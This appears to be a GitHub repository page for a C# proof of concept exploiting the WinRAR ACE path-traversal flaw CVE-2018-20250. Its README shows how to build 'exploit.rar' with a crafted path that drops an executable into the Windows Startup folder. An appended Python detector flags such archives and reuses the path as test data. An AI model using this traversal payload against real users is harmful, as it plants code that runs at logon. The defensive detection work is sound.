Proof of concept code in C# to exploit the WinRAR ACE file extraction path (CVE-2018-20250).
Latest commit 140a4d6 Mar 1, 2019
AceFile.cs Create AceFile.cs Feb 23, 2019
AceVolume.cs
README.md
Utils.cs Create Utils.cs Feb 23, 2019

README.md

CVE-2018-20250-WinRAR-ACE

Resources

https://research.checkpoint.com/extracting-code-execution-from-winrar/
https://github.com/droe/acefile
https://apidoc.roe.ch/acefile/latest/

Dependencies

InvertedTomato.Crc (you can install it with NuGet) for the checksum method. You can use any other JAMCRC implementation.

How to use

  AceVolume av = new AceVolume();
  AceFile f = new AceFile(
    @"D:\some_file.exe",
    @"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\some_file.exe"
  );
  av.AddFile(f);
  av.Save("exploit.rar");

Bugs

It seems that the file is only extracted to the Startup folder when the .rar file is on the Desktop or in any folder at the same level.
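For triage on the defensive side, a check for the kind of archive the "How to use" snippet produces: ACE content saved under a .rar name, with a member path that carries a drive specifier or a `..` component. This is an added example, not part of the repository. It assumes the header layout described in the acefile documentation linked under Resources, parses only 32-bit file headers (type 1), and does not verify header CRCs; `is_ace`, `member_names`, `scan` and the sample bytes are constructed here.

```python
import re
import struct

ACE_MAGIC = b"**ACE**"      # offset 7 of the main header, whatever the extension
TYPE_MAIN, TYPE_FILE32 = 0, 1
FLAG_ADDSIZE = 0x0001       # header is followed by packsize bytes of data
# Drive specifier, leading separator, or a ".." path component.
UNSAFE = re.compile(r"[A-Za-z]:|^[\\/]|(^|[\\/])\.\.([\\/]|$)")

def is_ace(data):
    return data[7:14] == ACE_MAGIC

def member_names(data):
    """Yield member names from 32-bit ACE file headers (type 1)."""
    pos = 0
    while pos + 7 <= len(data):
        _crc, hsize, htype, hflags = struct.unpack_from("<HHBH", data, pos)
        body, end = pos + 4, pos + 4 + hsize
        if hsize < 3 or end > len(data):
            return
        if htype == TYPE_MAIN:
            pos = end
        elif htype == TYPE_FILE32 and hflags & FLAG_ADDSIZE and hsize >= 31:
            # body: type(1) flags(2) packsize(4) origsize(4) time(4) attr(4)
            # crc32(4) comptype(1) compqual(1) params(2) reserved(2) namelen(2)
            (packsize,) = struct.unpack_from("<L", data, body + 3)
            (namelen,) = struct.unpack_from("<H", data, body + 29)
            yield data[body + 31:body + 31 + namelen].decode("latin-1")
            pos = end + packsize
        else:
            return              # other header types are out of scope here

def scan(filename, data):
    """Return findings for one file; an empty list means nothing flagged."""
    if not is_ace(data):
        return []
    hits = [] if filename.lower().endswith(".ace") else ["ACE content behind a non-.ace extension"]
    return hits + ["unsafe member path: " + n for n in member_names(data) if UNSAFE.search(n)]

def sample_hdr(body):           # constructed sample header, CRC left at zero
    return struct.pack("<HH", 0, len(body)) + body

def sample_member(name):        # constructed file header with no packed data
    return sample_hdr(struct.pack("<BH", 1, 1) + bytes(26)
                      + struct.pack("<H", len(name)) + name)

SAMPLE = (sample_hdr(b"\x00\x00\x00" + ACE_MAGIC + bytes(20)) + sample_member(b"docs\\readme.txt")
          + sample_member(rb"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\some_file.exe"))
```

`scan("exploit.rar", SAMPLE)` reports both the extension mismatch and the unsafe member path, while the `docs\readme.txt` member passes.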
